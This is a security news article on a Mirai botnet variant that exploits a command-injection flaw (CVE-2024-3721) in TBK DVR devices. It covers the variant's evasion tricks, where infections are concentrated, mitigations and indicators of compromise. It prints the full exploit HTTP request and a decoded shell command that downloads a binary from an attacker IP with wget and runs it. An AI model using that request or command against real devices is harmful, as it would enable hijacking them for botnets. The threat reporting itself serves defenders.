Thursday, June 12, 2025
Homecyber securityNew Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

Published on

SIEM as a Service

Follow Us on Google News

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.

This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.

Exploitation Vector & Payload Delivery

Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.

- Advertisement - Google News

The injected command downloads and executes an ARM32 binary:

textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

The decoded shell script executes:

bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk

This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.

Malware Modifications & Evasion Tactics

The Mirai variant incorporates several upgrades:

1. RC4 String Encryption

  • Uses XOR-encrypted RC4 key: 6e7976666525a97639777d2d7f303177
  • Decrypted strings stored in a custom DataDecrypted structure for runtime access

2. Anti-Analysis Checks

  • Scans /proc/[PID]/cmdline for VMware/QEMU indicators
  • Validates execution path against hardcoded directories: text/dev/shm /tmp /var/run

3. Process Whitelisting
Terminates competing malware processes like Hajime, Anarchy, and Mozi to monopolize device resources.

Infection Metrics & Mitigation

Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.

Mitigation StrategyImplementation
Firmware PatchingApply TBK’s 20240412+ updates
Network SegmentationIsolate DVRs from critical infrastructure
Input SanitizationBlock special characters in mdb/mdc parameters

Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Device owners should prioritize firmware updates and consider factory resets for compromised units.

Indicators of Compromise

textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84  
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc  

This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.

The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.

To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online â€“ Enroll Here

Anupriya
Anupriya
Any Priya is a cybersecurity reporter at GBHackers On Security, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.

Latest articles

Windows Defender Bypass Using PowerShell and Registry Edits in CyberEYE RAT

A newly discovered remote access trojan (RAT) named CyberEye is making waves in the cybersecurity community...

AitM Phishing Attacks on Microsoft 365 and Google Aimed at Stealing Login Credentials

A dramatic escalation in phishing attacks leveraging Adversary-in-the-Middle (AiTM) techniques has swept across organizations...

OneLogin AD Connector Vulnerabilities Expose Authentication Credentials

A critical security vulnerability in OneLogin’s Active Directory (AD) Connector service has exposed enterprise...

Threat Actors Using Bat Files to Deploy Quasar RAT

Remote Access Trojans (RATs) like Quasar have been a persistent threat for years, enabling attackers...

Credential Abuse: 15-Min Attack Simulation

Credential Abuse Unmasked

Credential abuse is #1 attack vector in web and API breaches today (Verizon DBIR 2025). Join our live, 15-min attack simulation with Karthik Krishnamoorthy (CTO - Indusface) and Phani Deepak Akella (VP of Marketing - Indusface) to see hackers move from first probe to full account takeover.

Discussion points


Username & email enumeration – how a stray status-code reveals valid accounts.
Password spraying – low-and-slow guesses that evade basic lockouts.
Credential stuffing – lightning-fast reuse of breach combos at scale.
MFA / session-token bypass – sliding past second factors with stolen cookies.

More like this

Windows Defender Bypass Using PowerShell and Registry Edits in CyberEYE RAT

A newly discovered remote access trojan (RAT) named CyberEye is making waves in the cybersecurity community...

AitM Phishing Attacks on Microsoft 365 and Google Aimed at Stealing Login Credentials

A dramatic escalation in phishing attacks leveraging Adversary-in-the-Middle (AiTM) techniques has swept across organizations...

OneLogin AD Connector Vulnerabilities Expose Authentication Credentials

A critical security vulnerability in OneLogin’s Active Directory (AD) Connector service has exposed enterprise...